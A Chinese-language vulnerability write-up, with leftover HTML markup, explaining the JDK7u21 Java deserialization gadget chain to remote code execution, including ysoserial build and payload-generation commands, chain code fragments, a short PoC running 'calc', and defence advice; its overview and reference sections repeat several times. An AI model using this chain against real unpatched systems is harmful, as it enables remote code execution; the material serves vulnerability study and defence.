JDK7u21反序列化漏洞分析与利用<\/h1>

0x00 漏洞概述<\/h2>
JDK7u21反序列化漏洞是Java反序列化漏洞中的一个经典案例，影响JRE版本<=7u21。该漏洞利用Java反序列化机制中的一系列特性，通过精心构造的恶意对象链实现远程代码执行(RCE)。<\/p>

0x01 前置知识<\/h2>

Java三大核心概念<\/h3>

JVM(Java虚拟机)<\/strong><\/p>

类加载器：加载.class文件到内存<\/li>
字节码验证工具：检查代码违规<\/li>
执行引擎：字节码转机器码<\/li>
JIT：即时编译提高性能<\/li>
作用：实现Java跨平台性<\/li> <\/ul> <\/li>

JRE(Java运行环境)<\/strong><\/p>

JRE = JVM + 核心类库 + 工具(keytool等)<\/li> <\/ul> <\/li>

JDK(Java开发工具包)<\/strong><\/p>

JDK = JRE + 开发工具(javac等) + 基础类库<\/li> <\/ul> <\/li> <\/ol>
JDK版本命名规则<\/h3>

JDK 1.0 - 1.1.8 (1996-1999)<\/li>
J2SE 1.2 - 1.4 (1998-2003)<\/li>
Java SE 5.0 (1.5.0)开始新命名方式<\/li>
Java SE 6.0 (1.6.0)<\/li>
Java SE 7.0 (1.7.0) - 漏洞影响版本<\/li>
Java SE 8.0+ (1.8.0+)<\/li> <\/ul>
0x02 环境搭建<\/h2>
工具准备<\/h3>

IDE: IntelliJ IDEA\/Eclipse<\/li>
漏洞利用工具: ysoserial
git clone https:\/\/github.com\/frohoff\/ysoserial <\/span><\/span>cd ysoserial <\/span><\/span>mvn clean package -DskipTests <\/span><\/span><\/code><\/pre><\/li> <\/ul> JDK安装<\/h3> 漏洞版本: JDK7u21及以下<\/li> Mac安装: brew cask install homebrew\/cask-versions\/zulu7 <\/span><\/span><\/code><\/pre><\/li> <\/ul> 0x03 漏洞分析<\/h2> 漏洞利用链<\/h3> 完整调用链:<\/p> LinkedHashSet.readObject() LinkedHashSet.add() ... TemplatesImpl.hashCode() LinkedHashSet.add() ... Proxy(Templates).hashCode() AnnotationInvocationHandler.invoke() AnnotationInvocationHandler.hashCodeImpl() String.hashCode() AnnotationInvocationHandler.memberValueHashCode() TemplatesImpl.hashCode() Proxy(Templates).equals() AnnotationInvocationHandler.invoke() AnnotationInvocationHandler.equalsImpl() Method.invoke() ... TemplatesImpl.getOutputProperties() TemplatesImpl.newTransformer() TemplatesImpl.getTransletInstance() TemplatesImpl.defineTransletClasses() ClassLoader.defineClass() Class.newInstance() MaliciousClass.<clinit>() Runtime.exec() <\/code><\/pre> 第一层: TemplatesImpl利用<\/h3> 核心代码:<\/p> TemplatesImpl calc =<\/span> (<\/span>TemplatesImpl)<\/span> Gadgets.<\/span>createTemplatesImpl<\/span>(<\/span>"command"<\/span>);<\/span> <\/span><\/span>calc.<\/span>getOutputProperties<\/span>();<\/span> \/\/ 触发点 <\/span><\/span><\/span><\/code><\/pre>触发流程:<\/p> getOutputProperties()<\/code>调用newTransformer()<\/code><\/li> newTransformer()<\/code>调用getTransletInstance()<\/code><\/li> getTransletInstance()<\/code>调用defineTransletClasses()<\/code><\/li> defineTransletClasses()<\/code>通过ClassLoader.defineClass()<\/code>加载恶意类<\/li> Class.newInstance()<\/code>触发静态代码块执行命令<\/li> <\/ol> 关键点:<\/p> 使用javassist动态生成恶意类<\/li> 恶意类必须继承AbstractTranslet<\/code><\/li> 通过_bytecodes<\/code>属性注入恶意字节码<\/li> <\/ul> 第二层: AnnotationInvocationHandler代理<\/h3> 核心代码:<\/p> HashMap map =<\/span> new<\/span> HashMap();<\/span> <\/span><\/span>map.<\/span>put<\/span>(<\/span>"f5a5a608"<\/span>,<\/span> "foo"<\/span>);<\/span> \/\/ 特殊hash值 <\/span><\/span><\/span><\/span> <\/span><\/span>InvocationHandler handler =<\/span> new<\/span> AnnotationInvocationHandler(<\/span> <\/span><\/span> Override.<\/span>class<\/span>,<\/span> map);<\/span> <\/span><\/span>Reflections.<\/span>setFieldValue<\/span>(<\/span>handler,<\/span> "type"<\/span>,<\/span> Templates.<\/span>class<\/span>);<\/span> <\/span><\/span>Templates proxy =<\/span> Gadgets.<\/span>createProxy<\/span>(<\/span>handler,<\/span> Templates.<\/span>class<\/span>);<\/span> <\/span><\/span><\/code><\/pre>利用动态代理机制:<\/p> 创建AnnotationInvocationHandler<\/code>代理<\/li> 设置type<\/code>为Templates.class<\/code><\/li> 代理对象的equals()<\/code>方法会调用equalsImpl()<\/code><\/li> equalsImpl()<\/code>通过反射调用Templates<\/code>接口方法<\/li> <\/ul> 第三层: LinkedHashSet触发<\/h3> 核心代码:<\/p> LinkedHashSet set =<\/span> new<\/span> LinkedHashSet();<\/span> <\/span><\/span>set.<\/span>add<\/span>(<\/span>templates);<\/span> \/\/ 第一个元素 <\/span><\/span><\/span><\/span>set.<\/span>add<\/span>(<\/span>proxy);<\/span> \/\/ 第二个元素 <\/span><\/span><\/span><\/code><\/pre>反序列化触发流程:<\/p> LinkedHashSet.readObject()<\/code>读取元素<\/li> 添加第一个元素(templates)计算hash<\/li> 添加第二个元素(proxy)时: 计算proxy的hash触发hashCodeImpl()<\/code><\/li> hashCodeImpl()<\/code>返回与templates相同的hash<\/li> 触发equals()<\/code>比较<\/li> equals()<\/code>调用newTransformer()<\/code>触发RCE<\/li> <\/ul> <\/li> <\/ol> 0x04 漏洞利用<\/h2> 生成Payload<\/h3> java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Jdk7u21 "command"<\/span> > payload.ser <\/span><\/span><\/code><\/pre>完整POC示例<\/h3> public<\/span> class<\/span> JDK7u21Exploit<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> Object payload =<\/span> new<\/span> Jdk7u21().<\/span>getObject<\/span>(<\/span>"calc"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> ByteArrayOutputStream baos =<\/span> new<\/span> ByteArrayOutputStream();<\/span> <\/span><\/span> ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>baos);<\/span> <\/span><\/span> oos.<\/span>writeObject<\/span>(<\/span>payload);<\/span> <\/span><\/span> oos.<\/span>close<\/span>();<\/span> <\/span><\/span> <\/span><\/span> byte<\/span>[]<\/span> bytes =<\/span> baos.<\/span>toByteArray<\/span>();<\/span> <\/span><\/span> <\/span><\/span> ByteArrayInputStream bais =<\/span> new<\/span> ByteArrayInputStream(<\/span>bytes);<\/span> <\/span><\/span> ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>bais);<\/span> <\/span><\/span> ois.<\/span>readObject<\/span>();<\/span> \/\/ 触发反序列化 <\/span><\/span><\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> e.<\/span>printStackTrace<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>0x05 漏洞特点<\/h2> Payload小<\/strong>：仅3489字节，适合各种环境<\/li> 无第三方依赖<\/strong>：仅使用JDK原生类<\/li> 利用条件<\/strong>：目标使用JDK7u21及以下<\/li> 存在反序列化入口点<\/li> <\/ul> <\/li> <\/ol> 0x06 防御措施<\/h2> 升级JDK到7u25及以上版本<\/li> 使用白名单验证反序列化对象<\/li> 使用ObjectInputFilter<\/code>限制反序列化类<\/li> 替换默认的序列化机制(如使用JSON)<\/li> <\/ol> 0x07 参考链接<\/h2> Java SE 7u21 Security Advisory<\/a><\/li> ysoserial JDK7u21<\/a><\/li> Java反序列化漏洞详解<\/a><\/li> <\/ol>

JDK7u21反序列化漏洞分析与利用<\/h1>

0x00 漏洞概述<\/h2> JDK7u21反序列化漏洞是Java反序列化漏洞中的一个经典案例，影响JRE版本<=7u21。该漏洞利用Java反序列化机制中的一系列特性，通过精心构造的恶意对象链实现远程代码执行(RCE)。<\/p>

0x01 前置知识<\/h2>

0x02 环境搭建<\/h2>

0x03 漏洞分析<\/h2>

0x04 漏洞利用<\/h2>

0x07 参考链接<\/h2> Java SE 7u21 Security Advisory<\/a><\/li> ysoserial JDK7u21<\/a><\/li> Java反序列化漏洞详解<\/a><\/li> <\/ol>

0x00 漏洞概述<\/h2>
JDK7u21反序列化漏洞是Java反序列化漏洞中的一个经典案例，影响JRE版本<=7u21。该漏洞利用Java反序列化机制中的一系列特性，通过精心构造的恶意对象链实现远程代码执行(RCE)。<\/p>

0x07 参考链接<\/h2>

Java SE 7u21 Security Advisory<\/a><\/li>
ysoserial JDK7u21<\/a><\/li>
Java反序列化漏洞详解<\/a><\/li> <\/ol>